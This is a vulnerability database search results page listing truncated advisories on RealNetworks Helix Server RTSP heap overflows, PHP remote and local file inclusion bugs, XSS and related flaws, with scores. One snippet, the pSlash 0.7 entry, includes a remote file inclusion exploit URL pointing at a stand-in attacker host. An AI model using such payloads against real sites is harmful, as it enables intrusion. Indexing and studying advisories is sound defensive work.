Lucene search
K

1665 matches found

Zero Day Initiative
Zero Day Initiative
added 2008/12/16 12:0 a.m.25 views

RealNetworks Helix DNA Server RTSP DESCRIBE Heap Overflow Vulnerability

This vulnerability allows attackers to execute arbitrary code on vulnerable installations of RealNetworks Helix Server. User interaction is not required to exploit this vulnerability. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rmserver.exe...

7.7AI score
Exploits0
Prion
Prion
added 2008/10/17 8:33 p.m.23 views

Code injection

Apple iPhone 2.1 with firmware 5F136, when Require Passcode is enabled and Show SMS Preview is disabled, allows physically proximate attackers to obtain sensitive information by performing an Emergency Call tap and then reading SMS messages on the device screen, aka Apple bug number 6267416...

1.2CVSS5.7AI score0.00323EPSS
Exploits0References3Affected Software1
Saint
Saint
added 2008/03/18 12:0 a.m.19 views

RealNetworks Helix Server RTSP Proxy-Require heap overflow

Added: 03/18/2008 CVE: CVE-2008-5911 BID: 33059 Background RealNetworks Helix Server is a media server supporting multiple formats and platforms. Problem A heap overflow vulnerability allows remote attackers to execute arbitrary commands by sending a long, specially crafted Proxy-Require header i...

10CVSS7.6AI score0.06185EPSS
Exploits4
Saint
Saint
added 2008/03/18 12:0 a.m.36 views

RealNetworks Helix Server RTSP Proxy-Require heap overflow

Added: 03/18/2008 CVE: CVE-2008-5911 BID: 33059 Background RealNetworks Helix Server is a media server supporting multiple formats and platforms. Problem A heap overflow vulnerability allows remote attackers to execute arbitrary commands by sending a long, specially crafted Proxy-Require header i...

10CVSS7.6AI score0.06185EPSS
Exploits4
Saint
Saint
added 2008/03/18 12:0 a.m.24 views

RealNetworks Helix Server RTSP Proxy-Require heap overflow

Added: 03/18/2008 CVE: CVE-2008-5911 BID: 33059 Background RealNetworks Helix Server is a media server supporting multiple formats and platforms. Problem A heap overflow vulnerability allows remote attackers to execute arbitrary commands by sending a long, specially crafted Proxy-Require header i...

10CVSS7.6AI score0.06185EPSS
Exploits4
Saint
Saint
added 2008/03/18 12:0 a.m.29 views

RealNetworks Helix Server RTSP Proxy-Require heap overflow

Added: 03/18/2008 CVE: CVE-2008-5911 BID: 33059 Background RealNetworks Helix Server is a media server supporting multiple formats and platforms. Problem A heap overflow vulnerability allows remote attackers to execute arbitrary commands by sending a long, specially crafted Proxy-Require header i...

10CVSS7.6AI score0.06185EPSS
Exploits4
Prion
Prion
added 2007/08/28 1:17 a.m.20 views

Heap overflow

Heap-based buffer overflow in the RTSP service in Helix DNA Server before 11.1.4 allows remote attackers to execute arbitrary code via an RSTP command containing multiple Require headers...

10CVSS8.5AI score0.05506EPSS
Exploits0References7Affected Software1
securityvulns
securityvulns
added 2007/04/16 12:0 a.m.46 views

B2evolution 1.6 RFi

Script Name : B2evolution 1.6 Download : http://scripts.ringsworld.com/blog/b2evolution-1.6-2005-11-25.zip Coded by : KaRTaL Contact msn : k4rtalatgmaildotcom reguire : require dirnameFILE.'/'.$coresubdir.'blogmain.inc.php' ; exploit :...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2007/04/11 12:0 a.m.155 views

PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities

.-""""""""-. / Dj7xpl | | |, .-. .-. ,| | o/ o | |/ / | @ ^^ |IIIIII|/ @8@8|-IIIIII/-| / / @ +Iranian Are The Best In World+ Portal.......: PcP-Book 3.0 Site.........: http://www.pcp-system.at Down.........: http://www.ectona.org/download/?id=621&amp...

0.3AI score
Exploits0
exploitpack
exploitpack
added 2007/04/08 12:0 a.m.10 views

PcP-Guestbook 3.0 - lang Local File Inclusion

PcP-Guestbook 3.0 - lang Local File Inclusion .-""""""""-. / Dj7xpl \ | | |, .-. .-. ,| | o/ \o | |/ /\ | @ ^^ \|IIIIII|/ @8@8 / \ / @ +Iranian Are The Best In World+ Portal.......: PcP-Book 3.0 Site.........: http://www.pcp-system.at Down.........: http://www.ectona.org/download/?id=621&s=info...

0.2AI score
Exploits0
exploitpack
exploitpack
added 2006/12/21 12:0 a.m.12 views

Newxooper-PHP 0.9.1 - mapage.php Remote File Inclusion

Newxooper-PHP 0.9.1 - mapage.php Remote File Inclusion Newxooper-php v0.9.1chemin Remote File Include Vulnerabilty Download:http://www.easy-script.com/newxoope-091.zip Author:Dr Max Virus Location:Egypt Bug in compteur/mapage.php In Line:37 Vul Code: REQUIRE "$chemin/compteur/mapage.txt"; POC:...

7.5AI score
Exploits0
0day.today
0day.today
added 2006/12/21 12:0 a.m.54 views

inertianews 0.02b (inertianews_main.php) Remote Include Vulnerability

Exploit for unknown platform in category web applications ===================================================================== inertianews 0.02b inertianewsmain.php Remote Include Vulnerability =====================================================================...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/10/18 12:0 a.m.66 views

LoCal Calendar 1.1 (lcUser.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================= LoCal Calendar 1.1 lcUser.php Remote File Include Vulnerability =================================================================...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/08/23 12:0 a.m.58 views

pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2006/05/02 12:0 a.m.30 views

VHCS --- Virtual Hosting Control System Cross Site Scripting

---------------------------------------------------------- Aria-Security.net Advisory Discovered by: O.U.T.L.A.W www.Aria-security.net Gr33t to: A.u.r.a & R@1D3N & Smok3r ----------------------------------------------------------- Software: VHCS Link: http://www.vhcs.net Attack method: Cross Site...

0.2AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2006/04/16 12:0 a.m.25 views

PAJAX < 0.5.2 Multiple Vulnerabilities

The remote host is running PAJAX, a PHP library for remote asynchronous objects in JavaScript. The version of PAJAX installed on the remote host fails to validate input to the 'pajax/pajaxcalldispatcher.php' script before using it in a PHP 'eval' function. An unauthenticated attacker can exploit...

7.5CVSS6AI score0.36127EPSS
Exploits5References4
Prion
Prion
added 2006/01/21 12:3 a.m.18 views

Design/Logic Flaw

TYPO3 3.7.1 allows remote attackers to obtain sensitive information via a direct request to 1 thumbs.php, 2 showpic.php, or 3 tables.php, which causes them to incorrectly define a variable and reveal the path in an error message when a require function call fails...

5CVSS6.7AI score0.0231EPSS
Exploits1References11Affected Software1
Gentoo Linux
Gentoo Linux
added 2004/09/02 12:0 a.m.22 views

Gallery: Arbitrary command execution

Background Gallery is a PHP script for maintaining online photo albums. Description The upload handling code in Gallery places uploaded files in a temporary directory. After 30 seconds, these files are deleted if they are not valid images. However, since the file exists for 30 seconds, a carefull...

7.5CVSS6.8AI score0.05233EPSS
Exploits1
securityvulns
securityvulns
added 2002/05/28 12:0 a.m.35 views

Achims Guestbook, InertiaNews, Pollen, MyPhpChat, mcPass

Product 1 : Achims Guestbook 2.51 and less? http://www.lkcc.org:8500/index.php Problem : - Informations Disclosure Exploits : - /data/.dat e.g. : data.dat - /temp/.tmp e.g. : ip.tmp Product 2 : InertiaNews 0.02 beta http://www.brentc.com Problem : - Require; Exploit : -...

0.1AI score
Exploits0
CVE
CVE
added 1976/01/01 12:0 a.m.20 views

CVE-2024-45069

CVE-2024-45069 entry is rejected/not used per the Initial Description.

6.7AI score
Exploits0
Rows per page
Query Builder